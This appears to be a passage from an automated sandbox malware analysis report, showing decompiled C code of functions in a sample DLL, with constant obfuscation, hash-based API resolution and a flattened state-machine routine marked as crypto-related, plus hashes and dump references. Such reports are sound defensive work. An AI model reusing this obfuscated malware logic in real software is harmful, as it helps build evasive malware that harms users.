Instruction ID: 57304660e441e25867bee0842cc12419e3d4fd34e7f076c2845e03c5d686c36d
Opcode Fuzzy Hash: 043c1465bbb069e7498e7776d98aa1155250e9bcbacd39a9879b6882dcaed79c
Instruction Fuzzy Hash: CE121171508381DFE368CF65C48AA4BBBE1FBC5748F10891DE1D98A2A0D7B99948CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10003A9D Relevance: 1.3, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E10003A9D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				intOrPtr* _t47;
				void* _t48;
				void* _t51;

				_t51 = __ecx;
				E10012550(_t41);
				_v20 = 0xed8d;
				_v20 = _v20 ^ 0x2284c4a6;
				_v20 = _v20 + 0xffffa06f;
				_v20 = _v20 ^ 0x2283e065;
				_v12 = 0x905a;
				_v12 = _v12 << 8;
				_v12 = _v12 << 7;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x00245e38;
				_v16 = 0x953;
				_v16 = _v16 + 0x862;
				_v16 = _v16 | 0x9a07eda1;
				_v16 = _v16 ^ 0x9a07a0a7;
				_v8 = 0x873e;
				_v8 = _v8 >> 8;
				_v8 = _v8 | 0x8037eff8;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0xfbffb05c;
				_t47 = E10007378(__ecx, 0x67d5b64a, __ecx, 0x90f109b3, 0x217);
				_t48 =  *_t47(_a16, 0, _t51, __ecx, __edx, _a4, _a8, 0, _a16); // executed
				return _t48;
			}

0x10003aa7
0x10003ab3
0x10003ab8
0x10003ac2
0x10003ac9
0x10003ad0
0x10003ad7
0x10003ade
0x10003ae2
0x10003ae6
0x10003aea
0x10003af1
0x10003af8
0x10003aff
0x10003b06
0x10003b0d
0x10003b14
0x10003b18
0x10003b1f
0x10003b23
0x10003b47
0x10003b55
0x10003b5b

Strings

8^$, xrefs: 10003AEA

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8^$
API String ID: 0-3439524145
Opcode ID: f7ee4ba59d9aedb6e8b021b23b67919be718760e8479286d17124b84891dc9ab
Instruction ID: cb5475921a34d7c12bf54c0edd17fef671e43c1f903db5a45a438928b48ff0e2
Opcode Fuzzy Hash: f7ee4ba59d9aedb6e8b021b23b67919be718760e8479286d17124b84891dc9ab
Instruction Fuzzy Hash: 9C1112B6C01218FBEB05DF94CD4A9DEBBB4FB00714F108188E82466291D3B65B14DF94

Uniqueness

Uniqueness Score: -1.00%

Function 10007F4B Relevance: 1.3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E10007F4B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;

				_t46 = __ecx;
				E10012550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				_t42 = E10007378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 =  *_t42(_t46, _a4, __ecx, __edx, _a4, _a8, _a12); // executed
				return _t43;
			}

0x10007f55
0x10007f5f
0x10007f64
0x10007f6b
0x10007f72
0x10007f79
0x10007f94
0x10007f97
0x10007f9e
0x10007fa5
0x10007fac
0x10007fb3
0x10007fba
0x10007fbe
0x10007fc5
0x10007fcc
0x10007fd3
0x10007fd7
0x10007feb
0x10007ff7
0x10007ffd

Strings

ZHq, xrefs: 10007F6B

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ZHq
API String ID: 0-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: b6af09a25d8170d0a87d6f19c7de7c036f2fabc2a5b8ad87d132c03d87a4a39c
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: 8D110FBAC00219ABEF00DFA4C94A8DEBFB4FF04318F108588E92466241D3B95B14DFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10015250 Relevance: 48.4, Strings: 38, Instructions: 936
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E10015250() {
				char _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v96;
				char _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				intOrPtr _v132;
				char _v140;
				void* _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				unsigned int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				unsigned int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				unsigned int _v360;
				unsigned int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				void* __ebx;
				intOrPtr _t927;
				intOrPtr _t947;
				signed int _t1117;
				signed int _t1118;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1135;
				signed int _t1136;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				void* _t1148;
				void* _t1149;
				void* _t1150;

				_t1145 = (_t1143 & 0xfffffff8) - 0x220;
				_v72 = _v72 & 0x00000000;
				_v84 = 0x209410;
				_t1034 = 0x12e722cf;
				_v80 = 0x7fb3a;
				_v76 = 0x87a05;
				_v476 = 0x6f2d;
				_v476 = _v476 ^ 0x017c3002;
				_v476 = _v476 + 0xffffbd18;
				_v476 = _v476 | 0xc91499cd;
				_v476 = _v476 ^ 0xc97c9eea;
				_v280 = 0x77b6;
				_v280 = _v280 + 0x5656;
				_v280 = _v280 ^ 0x000089ef;
				_v380 = 0x736f;
				_v380 = _v380 << 2;
				_v380 = _v380 + 0x5e6a;
				_v380 = _v380 ^ 0x00026114;
				_v216 = 0xcbd1;
				_v216 = _v216 ^ 0x44eba388;
				_v216 = _v216 ^ 0x44eb05d5;
				_v296 = 0xc4c6;
				_v296 = _v296 + 0x2d2;
				_v296 = _v296 ^ 0x0000e1e8;
				_v288 = 0x42e8;
				_t1121 = 0x3f;
				_v288 = _v288 / _t1121;
				_v288 = _v288 ^ 0x00000dcd;
				_v244 = 0x282;
				_v244 = _v244 >> 6;
				_v244 = _v244 ^ 0x0000405b;
				_v252 = 0x771a;
				_v252 = _v252 >> 0xe;
				_v252 = _v252 ^ 0x00001031;
				_v492 = 0xf437;
				_v492 = _v492 >> 3;
				_t1122 = 0x61;
				_v492 = _v492 / _t1122;
				_v492 = _v492 + 0xffff3f4e;
				_v492 = _v492 ^ 0xffff2cd5;
				_v192 = 0x3176;
				_v192 = _v192 + 0x69b1;
				_v192 = _v192 ^ 0x0000ea14;
				_v420 = 0xc417;
				_v420 = _v420 + 0x8980;
				_v420 = _v420 ^ 0xd4e62d65;
				_v420 = _v420 ^ 0xd4e7684b;
				_v212 = 0x15f4;
				_v212 = _v212 * 0x22;
				_v212 = _v212 ^ 0x0002e648;
				_v456 = 0xe852;
				_v456 = _v456 >> 0xd;
				_v456 = _v456 + 0xffffcc84;
				_v456 = _v456 << 0xe;
				_v456 = _v456 ^ 0xf322a6d4;
				_v536 = 0x2d0a;
				_v536 = _v536 ^ 0xa9ca95e4;
				_v536 = _v536 * 0xe;
				_v536 = _v536 + 0xcaaf;
				_v536 = _v536 ^ 0x4916b696;
				_v224 = 0xd1a0;
				_v224 = _v224 >> 0xc;
				_v224 = _v224 ^ 0x00006736;
				_v184 = 0xb552;
				_v184 = _v184 ^ 0x240384b8;
				_v184 = _v184 ^ 0x24037a21;
				_v472 = 0x9384;
				_t1117 = 0x52;
				_v472 = _v472 / _t1117;
				_v472 = _v472 + 0x4a96;
				_v472 = _v472 ^ 0xcc9e8605;
				_v472 = _v472 ^ 0xcc9ec215;
				_v236 = 0x7622;
				_v236 = _v236 + 0xffff4cbc;
				_v236 = _v236 ^ 0xfffff78f;
				_v548 = 0xb822;
				_v548 = _v548 ^ 0x5a18f77c;
				_v548 = _v548 + 0xffff6a91;
				_t1123 = 6;
				_v548 = _v548 * 0x46;
				_v548 = _v548 ^ 0xa27cfa0f;
				_v428 = 0x9f04;
				_v428 = _v428 * 0x35;
				_v428 = _v428 + 0xde16;
				_v428 = _v428 ^ 0x0021bdfd;
				_v516 = 0xd39a;
				_v516 = _v516 / _t1123;
				_v516 = _v516 + 0x15af;
				_t1124 = 0x59;
				_v516 = _v516 / _t1124;
				_v516 = _v516 ^ 0x00007e9e;
				_v308 = 0xa16d;
				_v308 = _v308 + 0xe711;
				_v308 = _v308 + 0xffff4f28;
				_v308 = _v308 ^ 0x00009f4e;
				_v532 = 0x7266;
				_t1125 = 0x28;
				_v532 = _v532 / _t1125;
				_v532 = _v532 * 0x3d;
				_v532 = _v532 ^ 0xce065b2a;
				_v532 = _v532 ^ 0xce06dfd5;
				_v196 = 0x1672;
				_v196 = _v196 + 0xa446;
				_v196 = _v196 ^ 0x0000d90c;
				_v220 = 0xe32f;
				_v220 = _v220 << 6;
				_v220 = _v220 ^ 0x00389c68;
				_v432 = 0x625c;
				_v432 = _v432 + 0xffff71ce;
				_v432 = _v432 * 0x56;
				_v432 = _v432 + 0xffffa9e5;
				_v432 = _v432 ^ 0xfff0dd97;
				_v336 = 0xeda0;
				_v336 = _v336 + 0xeb07;
				_v336 = _v336 ^ 0x0001d4cc;
				_v272 = 0xcc88;
				_v272 = _v272 | 0x5dccb544;
				_v272 = _v272 ^ 0x5dccc982;
				_v352 = 0xf44c;
				_v352 = _v352 + 0xc438;
				_v352 = _v352 + 0xffff921a;
				_v352 = _v352 ^ 0x000119bf;
				_v500 = 0x896b;
				_v500 = _v500 + 0xffff320f;
				_v500 = _v500 << 2;
				_v500 = _v500 + 0x6054;
				_v500 = _v500 ^ 0xffff256a;
				_v468 = 0xb0db;
				_v468 = _v468 + 0x1d7c;
				_t1126 = 0x7c;
				_v468 = _v468 * 0x18;
				_v468 = _v468 / _t1126;
				_v468 = _v468 ^ 0x0000431a;
				_v384 = 0x26f0;
				_v384 = _v384 ^ 0x045f799c;
				_v384 = _v384 ^ 0x3dddf456;
				_v384 = _v384 ^ 0x39829c32;
				_v176 = 0xf7b7;
				_v176 = _v176 + 0x6391;
				_v176 = _v176 ^ 0x00016a08;
				_v248 = 0xecad;
				_v248 = _v248 + 0xffff796a;
				_v248 = _v248 ^ 0x00007c9b;
				_v376 = 0xe362;
				_v376 = _v376 + 0xffffce79;
				_t1127 = 0x13;
				_v376 = _v376 * 0x72;
				_v376 = _v376 ^ 0x004f6c3e;
				_v436 = 0x3eeb;
				_v436 = _v436 >> 7;
				_v436 = _v436 ^ 0x17e78ab4;
				_v436 = _v436 | 0x5631ea9d;
				_v436 = _v436 ^ 0x57f78106;
				_v344 = 0xfafb;
				_v344 = _v344 | 0xa088f90b;
				_v344 = _v344 << 4;
				_v344 = _v344 ^ 0x088fad6b;
				_v424 = 0xd20d;
				_v424 = _v424 | 0x976e33e5;
				_v424 = _v424 / _t1117;
				_v424 = _v424 ^ 0x01d88155;
				_v368 = 0xb305;
				_v368 = _v368 >> 4;
				_v368 = _v368 * 0x6f;
				_v368 = _v368 ^ 0x0004dd79;
				_v312 = 0x6c6e;
				_v312 = _v312 | 0x7aa669f9;
				_v312 = _v312 / _t1127;
				_v312 = _v312 ^ 0x0674fe9a;
				_v304 = 0x37ec;
				_v304 = _v304 ^ 0xd9da6a19;
				_v304 = _v304 ^ 0xd9da0267;
				_v408 = 0x189;
				_v408 = _v408 >> 3;
				_v408 = _v408 ^ 0x76db6b00;
				_v408 = _v408 ^ 0x76db7e0a;
				_v328 = 0xb7d;
				_v328 = _v328 ^ 0xd2ca4f28;
				_v328 = _v328 | 0x13588259;
				_v328 = _v328 ^ 0xd3da9a47;
				_v264 = 0xf9f8;
				_v264 = _v264 >> 0xc;
				_v264 = _v264 ^ 0x000003c9;
				_v256 = 0xc1c3;
				_v256 = _v256 + 0x1be1;
				_v256 = _v256 ^ 0x0000cdde;
				_v200 = 0x3e85;
				_t1128 = 0x76;
				_v200 = _v200 / _t1128;
				_v200 = _v200 ^ 0x000018d1;
				_v528 = 0x6317;
				_v528 = _v528 + 0x6e33;
				_v528 = _v528 << 0xa;
				_t1129 = 0x38;
				_v528 = _v528 / _t1129;
				_v528 = _v528 ^ 0x000eeaa2;
				_v180 = 0x5a91;
				_v180 = _v180 << 0x10;
				_v180 = _v180 ^ 0x5a913d65;
				_v484 = 0x2725;
				_v484 = _v484 >> 0xf;
				_v484 = _v484 + 0xffffcf28;
				_t1130 = 0x7f;
				_v484 = _v484 * 0x56;
				_v484 = _v484 ^ 0xffefd6a2;
				_v508 = 0xdc7;
				_v508 = _v508 * 0x18;
				_v508 = _v508 + 0xd9f6;
				_v508 = _v508 | 0xcb6e322e;
				_v508 = _v508 ^ 0xcb6e2f09;
				_v232 = 0xca01;
				_v232 = _v232 + 0xffff5b75;
				_v232 = _v232 ^ 0x0000641b;
				_v168 = 0x16fe;
				_v168 = _v168 ^ 0x17eb1dda;
				_v168 = _v168 ^ 0x17eb32d1;
				_v340 = 0xdfb5;
				_v340 = _v340 + 0xfffffcd7;
				_v340 = _v340 << 6;
				_v340 = _v340 ^ 0x00376540;
				_v260 = 0xf92f;
				_v260 = _v260 | 0xacfe7636;
				_v260 = _v260 ^ 0xacfe9e8f;
				_v348 = 0x96d2;
				_v348 = _v348 | 0x1aa809e7;
				_v348 = _v348 ^ 0x05f39991;
				_v348 = _v348 ^ 0x1f5b5d0b;
				_v396 = 0x247f;
				_v396 = _v396 ^ 0xf1f26a5d;
				_v396 = _v396 + 0xf16a;
				_v396 = _v396 ^ 0xf1f369c0;
				_v404 = 0xf1e8;
				_v404 = _v404 ^ 0x0fadedaf;
				_v404 = _v404 + 0x5347;
				_v404 = _v404 ^ 0x0fad279d;
				_v240 = 0x676b;
				_v240 = _v240 ^ 0xc965c134;
				_v240 = _v240 ^ 0xc965c068;
				_v412 = 0xa09f;
				_v412 = _v412 + 0xffff772a;
				_v412 = _v412 + 0xe197;
				_v412 = _v412 ^ 0x0000ae26;
				_v520 = 0xecbc;
				_v520 = _v520 + 0x348e;
				_v520 = _v520 / _t1130;
				_v520 = _v520 * 0x6f;
				_v520 = _v520 ^ 0x0000e534;
				_v284 = 0x3f47;
				_t455 =  &_v284; // 0x3f47
				_v284 =  *_t455 * 0x25;
				_v284 = _v284 ^ 0x00095ce6;
				_v276 = 0x6631;
				_v276 = _v276 | 0xb06bbfe9;
				_v276 = _v276 ^ 0xb06bf800;
				_v504 = 0x8c83;
				_v504 = _v504 * 0x5b;
				_v504 = _v504 * 0x3e;
				_v504 = _v504 >> 6;
				_v504 = _v504 ^ 0x00301e3a;
				_v488 = 0x4309;
				_v488 = _v488 >> 0xf;
				_t1131 = 0x58;
				_v488 = _v488 / _t1131;
				_v488 = _v488 + 0x27af;
				_v488 = _v488 ^ 0x000009a7;
				_v364 = 0xa96;
				_v364 = _v364 << 7;
				_v364 = _v364 >> 7;
				_v364 = _v364 ^ 0x00003920;
				_v480 = 0x9f6;
				_t1132 = 0x6b;
				_v480 = _v480 / _t1132;
				_v480 = _v480 << 0xd;
				_v480 = _v480 + 0xffff43ca;
				_v480 = _v480 ^ 0x00025c77;
				_v416 = 0xe237;
				_v416 = _v416 + 0xffff63bb;
				_v416 = _v416 + 0xffff2499;
				_v416 = _v416 ^ 0xffff6d1e;
				_v188 = 0x6325;
				_v188 = _v188 | 0xc894d050;
				_v188 = _v188 ^ 0xc8949af4;
				_v360 = 0xe854;
				_v360 = _v360 >> 5;
				_v360 = _v360 >> 4;
				_v360 = _v360 ^ 0x00006280;
				_v400 = 0x8eca;
				_v400 = _v400 << 7;
				_t1133 = 0x6d;
				_v400 = _v400 * 0x4b;
				_v400 = _v400 ^ 0x14eae0d6;
				_v228 = 0x2866;
				_v228 = _v228 + 0x1bda;
				_v228 = _v228 ^ 0x00005064;
				_v332 = 0x7acf;
				_v332 = _v332 + 0xffffa705;
				_v332 = _v332 + 0xffffeb79;
				_v332 = _v332 ^ 0x00001fe4;
				_v544 = 0x2e82;
				_v544 = _v544 ^ 0xbb465bc8;
				_v544 = _v544 << 0x10;
				_v544 = _v544 << 9;
				_v544 = _v544 ^ 0x94006b8d;
				_v172 = 0xf8c0;
				_v172 = _v172 + 0xffff4f46;
				_v172 = _v172 ^ 0x00007ce0;
				_v524 = 0xd322;
				_v524 = _v524 | 0x4cafabc6;
				_v524 = _v524 ^ 0x09010195;
				_v524 = _v524 + 0xb84e;
				_v524 = _v524 ^ 0x45afae17;
				_v444 = 0xdf24;
				_v444 = _v444 << 0xf;
				_v444 = _v444 * 0x7f;
				_v444 = _v444 * 0x51;
				_v444 = _v444 ^ 0x4bce658a;
				_v292 = 0x8547;
				_v292 = _v292 | 0x64a73ebc;
				_v292 = _v292 ^ 0x64a7de76;
				_v300 = 0x1ce8;
				_v300 = _v300 + 0xdb70;
				_v300 = _v300 ^ 0x0000b072;
				_v392 = 0x566a;
				_v392 = _v392 | 0x5a1da982;
				_v392 = _v392 ^ 0x760ad9ea;
				_v392 = _v392 ^ 0x2c170a90;
				_v452 = 0x771c;
				_v452 = _v452 / _t1133;
				_v452 = _v452 ^ 0xe02fadbb;
				_v452 = _v452 ^ 0xb094793c;
				_v452 = _v452 ^ 0x50bb905c;
				_v204 = 0xb4fc;
				_t1134 = 0x63;
				_v204 = _v204 * 0x11;
				_v204 = _v204 ^ 0x000c0424;
				_v440 = 0x57e7;
				_v440 = _v440 | 0xebefe10d;
				_t614 =  &_v440; // 0xebefe10d
				_t1135 = 0x14;
				_v440 =  *_t614 / _t1134;
				_v440 = _v440 / _t1135;
				_v440 = _v440 ^ 0x001e9b30;
				_v540 = 0x534c;
				_v540 = _v540 | 0xac4af998;
				_v540 = _v540 + 0xffff4dfb;
				_v540 = _v540 + 0xffffb0a1;
				_v540 = _v540 ^ 0xac498cbf;
				_v460 = 0x841e;
				_v460 = _v460 + 0x9fac;
				_v460 = _v460 ^ 0x2c3ea9f2;
				_v460 = _v460 ^ 0xceb30bb3;
				_v460 = _v460 ^ 0xe28ccd4f;
				_v448 = 0xa9f1;
				_v448 = _v448 << 0xe;
				_v448 = _v448 + 0x33e0;
				_t1136 = 0x50;
				_v448 = _v448 * 0xe;
				_v448 = _v448 ^ 0x52ce0554;
				_v316 = 0x479e;
				_v316 = _v316 + 0x2801;
				_v316 = _v316 * 0x3d;
				_v316 = _v316 ^ 0x001a91ff;
				_v464 = 0x359e;
				_v464 = _v464 ^ 0x5af2d531;
				_v464 = _v464 ^ 0x9823c549;
				_v464 = _v464 + 0xffffa5a2;
				_v464 = _v464 ^ 0xc2d0cb88;
				_v388 = 0x481d;
				_v388 = _v388 + 0xffff5910;
				_v388 = _v388 << 0xb;
				_v388 = _v388 ^ 0xfc3d09c8;
				_v324 = 0x8018;
				_v324 = _v324 + 0xd377;
				_v324 = _v324 << 2;
				_v324 = _v324 ^ 0x0005594c;
				_v512 = 0xfb10;
				_v512 = _v512 + 0xffff4579;
				_v512 = _v512 + 0xffff9736;
				_v512 = _v512 + 0xffff5835;
				_v512 = _v512 ^ 0xffff2ff5;
				_v208 = 0x364e;
				_v208 = _v208 ^ 0x8963ea5d;
				_v208 = _v208 ^ 0x8963d3b3;
				_v320 = 0x9607;
				_v320 = _v320 << 5;
				_v320 = _v320 | 0x1731ff4b;
				_v320 = _v320 ^ 0x1733e0ab;
				_v372 = 0x6e21;
				_v372 = _v372 | 0x9eeaeff3;
				_v372 = _v372 ^ 0x9ee75453;
				_v496 = 0x9db4;
				_v496 = _v496 * 0x4c;
				_v496 = _v496 ^ 0x6ed3af11;
				_v496 = _v496 / _t1136;
				_v496 = _v496 ^ 0x016ddf0e;
				_v268 = 0x5783;
				_t1137 = 0x22;
				_t1118 = _v336;
				_v268 = _v268 * 0x77;
				_v268 = _v268 ^ 0x0028a245;
				_v356 = 0xa4f9;
				_v356 = _v356 >> 0xa;
				_t1138 = _v336;
				_v356 = _v356 / _t1137;
				_v356 = _v356 ^ 0x00001f41;
				while(1) {
					L1:
					_t927 = 0xd2c2d4a;
					do {
						while(1) {
							L2:
							_t1148 = _t1034 - 0x1ccb6601;
							if(_t1148 > 0) {
								break;
							}
							if(_t1148 == 0) {
								__eflags = E10005F04();
								if(__eflags == 0) {
									E1001939E();
									asm("sbb ecx, ecx");
									_t1034 = (_t1034 & 0x13a1ab3e) + 0x11e6b71b;
								} else {
									E1001939E();
									asm("sbb ecx, ecx");
									_t1034 = (_t1034 & 0x265cbaf4) + 0xfb8ec94;
								}
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							_t1149 = _t1034 - _t927;
							if(_t1149 > 0) {
								__eflags = _t1034 - 0x11e6b71b;
								if(__eflags > 0) {
									__eflags = _t1034 - 0x12e722cf;
									if(__eflags == 0) {
										_t1034 = 0xc5704d6;
										continue;
									}
									__eflags = _t1034 - 0x16840c8b;
									if(__eflags == 0) {
										_push( &_v160);
										_v164 = E1001A966(_v500, _v468, __eflags, _t1034, _v384, _v176);
										E10014A9E(_v376, __eflags,  &_v164, _v436, _v500, _v344);
										_t1115 = _v368;
										E10010D6D(_v424, _v368, _v312, _v164);
										_t1145 = _t1145 + 0x28;
										_t1034 = 0x435e806;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									__eflags = _t1034 - 0x17da8405;
									if(_t1034 == 0x17da8405) {
										__eflags = E10014C37( &_v68, _v328, _v264);
										if(__eflags == 0) {
											L14:
											_t1034 = 0x27e8449b;
											while(1) {
												L1:
												_t927 = 0xd2c2d4a;
												goto L2;
											}
										}
										_t1115 = _v256;
										_v128 =  &_v68;
										_v124 = E100037A2( &_v68, _v256, _v200);
										_t1034 = 0x25120b57;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									__eflags = _t1034 - 0x17df5ed7;
									if(_t1034 != 0x17df5ed7) {
										goto L105;
									}
									_v116 = E10011DFE(_t1115);
									_t1034 = 0x1f9ed57a;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								if(__eflags == 0) {
									E1000E612();
									_t1034 = 0x2bcd9dcd;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xda73f77;
								if(_t1034 == 0xda73f77) {
									_t1115 = _v104;
									E1000DE81(_v392, _v104, _v452);
									L40:
									_t1034 = 0x6c42b3e;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xfb8ec94;
								if(_t1034 == 0xfb8ec94) {
									E1000A2D2();
									_t1034 = 0x24a19024;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xfc71b8b;
								if(_t1034 == 0xfc71b8b) {
									E10005DE0();
									_t1034 = 0x3423e013;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0x104daaf6;
								if(__eflags != 0) {
									goto L105;
								}
								_t1138 = 0x17da8405;
								_t1118 = E1000DF8A(_t1034, _t1115, __eflags, _v320, _v208);
								goto L40;
							}
							if(_t1149 == 0) {
								_t927 = E1000C364();
								L110:
								return _t927;
							}
							_t1150 = _t1034 - 0x8331fa3;
							if(_t1150 > 0) {
								__eflags = _t1034 - 0x8e3e7b7;
								if(_t1034 == 0x8e3e7b7) {
									__eflags = E1000BB96(_v416,  &_v148,  &_v140, _v188);
									if(__eflags == 0) {
										L94:
										_t1034 = 0x21dc4a65;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									E1001021C();
									__eflags = _v132;
									_t1034 = 0xfc71b8b;
									if(__eflags == 0) {
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									__eflags = _v132 - 7;
									_t927 = 0xd2c2d4a;
									_t1034 =  ==  ? 0xd2c2d4a : 0xfc71b8b;
									continue;
								}
								__eflags = _t1034 - 0x90774b6;
								if(_t1034 == 0x90774b6) {
									E10004D90();
									E1001939E();
									asm("sbb ecx, ecx");
									_t1034 = (_t1034 & 0xc99f24de) + 0x3954b45a;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xbc2d3ff;
								if(_t1034 == 0xbc2d3ff) {
									_t927 = E1000A821();
									__eflags = _t927;
									if(_t927 == 0) {
										goto L110;
									}
									E10002200(_v288);
									_t1034 = 0x2ec155bf;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xc5704d6;
								if(__eflags != 0) {
									goto L105;
								}
								_t927 = E10010E6B(_t1034, __eflags);
								__eflags = _t927;
								if(__eflags == 0) {
									goto L110;
								}
								_t1034 = 0x447f870;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1150 == 0) {
								E1000DE81(_v524, _v156, _v444);
								_t1034 = 0x23cd63af;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1034 == 0x2f3d938) {
								E10001806();
								_t1034 = 0x3954b45a;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1034 == 0x435e806) {
								_t1034 = 0x104daaf6;
								continue;
							}
							if(_t1034 == 0x447f870) {
								E1000EA16(0x1e95092c);
								_t1034 = 0xbc2d3ff;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1034 == 0x5a723c8) {
								_v120 = E10003FAF();
								_t1034 = 0x17df5ed7;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							_t1155 = _t1034 - 0x6c42b3e;
							if(_t1034 != 0x6c42b3e) {
								goto L105;
							}
							if(E10014F04(_t1155, _t1118) == 0) {
								_t1034 = _t1138;
								L104:
								_t927 = 0xd2c2d4a;
								goto L105;
							}
							goto L14;
						}
						__eflags = _t1034 - 0x27e8449b;
						if(__eflags > 0) {
							__eflags = _t1034 - 0x3423e013;
							if(__eflags > 0) {
								__eflags = _t1034 - 0x3615a788;
								if(_t1034 == 0x3615a788) {
									__eflags = E10019DBF();
